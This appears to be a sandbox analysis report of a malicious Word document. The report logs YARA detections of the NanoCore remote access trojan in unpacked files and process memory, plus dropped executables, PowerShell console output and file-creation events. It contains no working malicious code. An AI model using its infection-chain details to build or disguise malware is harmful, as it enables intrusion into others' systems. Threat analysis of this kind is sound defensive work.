      Source: 9.2.RegSvcs.exe.382be55.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.382be55.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.267d0b8.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.267d0b8.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.2689300.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.2689300.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.381fc21.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.381fc21.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.692715551.0000000004600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.692715551.0000000004600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.692864773.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.692864773.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.692736182.0000000004610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.692736182.0000000004610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690678018.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690678018.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690754072.0000000000A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690754072.0000000000A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.692788892.0000000004850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.692788892.0000000004850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drOLE indicator has summary info: false
      Source: plugmanzx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: plugmancdht5461.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: ZdNnwVcb.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$C_MDR0307_019.docJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@20/21@14/2
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 9.0.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 9.0.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP ServiceJump to behavior
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drOLE document summary: edited time not present or 0
      Source: DOC_MDR0307_019.docReversingLabs: Detection: 23%
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............T.......h...............................0.......#.......................................
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............T.......h...............................0.......#.......8...............................
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............T.......h...............................0......./.......................H.1.............
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............T.......h...............................0......./.......8...............................
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............T.......h.......7.......................0.......;...............|.......H.1.............
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............T.......D.......T.......................0.......;.......8...............................
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......|.......................0.......G.......8.......".......H.1.............
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............T.......D...............................0.......G.......8...............H.1.............
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............T.......D...............................0.......S.......................H.1.............
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............T.......D...............................0.......S.......8...............................
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.........e.x.e.(.P.............T.......D...............................0......._.......8...............H.1.............
